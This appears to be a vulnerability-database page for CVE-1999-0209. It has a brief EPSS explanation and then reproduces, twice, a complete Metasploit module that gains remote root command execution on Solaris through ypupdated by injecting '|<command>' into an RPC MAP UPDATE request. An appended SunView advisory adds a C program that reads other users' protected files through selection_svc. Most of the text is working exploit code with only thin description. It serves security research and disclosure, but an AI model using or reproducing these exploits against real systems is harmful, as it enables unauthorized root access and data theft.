CVE-1999-0209 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # $Id: ypupdated_exec.rb 9929 2010-07-25 21:37:54Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SunRPC def initialize(info = {}) super(update_info(info, 'Name' => 'Solaris ypupdated Command Execution', 'Description' => %q{ This exploit targets a weakness in the way the ypupdated RPC application uses the command shell when handling a MAP UPDATE request. Extra commands may be launched through this command shell, which runs as root on the remote host, by passing commands in the format '|<command>'. Vulnerable systems include Solaris 2.7, 8, 9, and 10, when ypupdated is started with the '-i' command-line option. }, 'Author' => [ 'I)ruid <druid@caughq.org>' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9929 $', 'References' => [ ['CVE', '1999-0209'], ['OSVDB', '11517'], ['BID', '1749'], ], 'Privileged' => true, 'Platform' => ['unix', 'solaris'], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl telnet', } }, 'Targets' => [ ['Automatic', { }], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 12 1994' )) register_options( [ OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']), OptInt.new('GID', [false, 'GID to emulate', 0]), OptInt.new('UID', [false, 'UID to emulate', 0]) ], self.class ) end def exploit hostname = datastore['HOSTNAME'] program = 100028 progver = 1 procedure = 1 print_status('Sending PortMap request for ypupdated program') pport = sunrpc_create('udp', program, progver) print_status("Sending MAP UPDATE request with command '#{payload.encoded}'") print_status('Waiting for response...') sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], []) command = '|' + payload.encoded msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000) sunrpc_call(procedure, msg) sunrpc_destroy print_status('No Errors, appears to have succeeded!') rescue ::Rex::Proto::SunRPC::RPCTimeout print_error('Warning: ' + $!) end end

____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground http://www.caughq.org Exploit Code ===============/======================================================== Exploit ID: CAU-EX-2008-0001 Release Date: 2008.04.04 Title: ypupdated_exec.rb Description: Solaris ypupdated Command Execution Tested: Solaris x86/sparc 10, sparc 9, 8, 2.7 Attributes: Remote, NULL Auth, Elevated Privileges, Metasploit Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0001.txt Author/Email: I)ruid <druid (@) caughq.org> ===============/======================================================== Description =========== This exploit targets a weakness in the way the ypupdated RPC application uses the command shell when handling a MAP UPDATE request. Extra commands may be launched through this command shell, which runs as root on the remote host, by passing commands in the format '|<command>'. Credits ======= Josh D. <mcpheea@cadvision.com> from Avalon Security Research is credited with originally discovering this vulnerability. This Metasploit exploit module was modeled after kcope's exploit released to Milw0rm on 2008.03.20. References ========== http://osvdb.org/displayvuln.php?osvdb_id=11517 http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0209 https://www.securityfocus.com/bid/1749/info http://www.milw0rm.com/exploits/5282 Metasploit ========== require 'msf/core' module Msf class Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote include Exploit::Remote::SunRPC def initialize(info = {}) super(update_info(info, 'Name' => 'Solaris ypupdated Command Execution', 'Description' => %q{ This exploit targets a weakness in the way the ypupdated RPC application uses the command shell when handling a MAP UPDATE request. Extra commands may be launched through this command shell, which runs as root on the remote host, by passing commands in the format '|<command>'. Vulnerable systems include Solaris 2.7, 8, 9, and 10, when ypupdated is started with the '-i' command-line option. }, 'Author' => [ 'I)ruid <druid@caughq.org>' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 4498 $', 'References' => [ ['BID', '1749'], ['CVE', '1999-0209'], ['OSVDB', '11517'], ], 'Privileged' => true, 'Platform' => ['unix', 'solaris'], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, }, 'Targets' => [ ['Automatic', { }], ], 'DefaultTarget' => 0 )) register_options( [ OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']), OptInt.new('GID', [false, 'GID to emulate', 0]), OptInt.new('UID', [false, 'UID to emulate', 0]) ], self.class ) end def exploit hostname = datastore['HOSTNAME'] program = 100028 progver = 1 procedure = 1 print_status 'Sending PortMap request for ypupdated program' pport = sunrpc_create('udp', program, progver) print_status "Sending MAP UPDATE request with command '#{payload.encoded}'" print_status 'Waiting for response...' sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], []) command = '|' + payload.encoded msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000) sunrpc_call(procedure, msg) sunrpc_destroy print_good 'No Errors, appears to have succeeded!' rescue ::Rex::Proto::SunRPC::RPCTimeout print_status 'Warning: ' + $! print_status 'Exploit may or may not have succeeded.' end end end # milw0rm.com [2008-04-04]

Source: https://www.securityfocus.com/bid/8/info On Sun3 and Sun4 systems, a remote system can read any file that is readable to the user running SunView. On the 386i, a remote system can read any file on the workstation running SunView regardless of protections. Note that if root runs Sunview, all files are potentially accessible by a remote system. Sunview does not kill the selection_svc process when the user quits from Sunview. Thus, unless the process is killed, remote systems can still read files that were readable to the last user that ran Sunview. Under these circumstances, once a user has run Sunview, start using another window system (such as X11), or even logoff, but still have files accessible to remote systems. /* SELN_HOLD_FILE * For use where someone has a selection_svc runnning as them, after an * invocation of suntools: * * % cat their_private_file * their_private_file: Permission denied * % cc seln_hold_file.c -o seln_hold_file -lsuntool -lsunwindow * % ./seln_hold_file their_private_file * % get_selection 2 * < contents of their_private_file > * % */ #include <stdio.h> #include <sys/types.h> #include <suntool/seln.h> main(argc, argv) int argc; char *argv[]; { Seln_result ret; if (argc != 2) { (void) fprintf(stderr, "usage: seln_grab file1\n"); exit(1); } ret = seln_hold_file(SELN_SECONDARY, argv[1]); seln_dump_result(stdout, &ret); printf("\n"); } /* * Local variables: * compile-command: "cc -sun3 -Bstatic -o seln_hold_file seln_hold_file.c -lsun tool -lsunwindow" * end: * * Static required because _mem_ops not included in ld.so */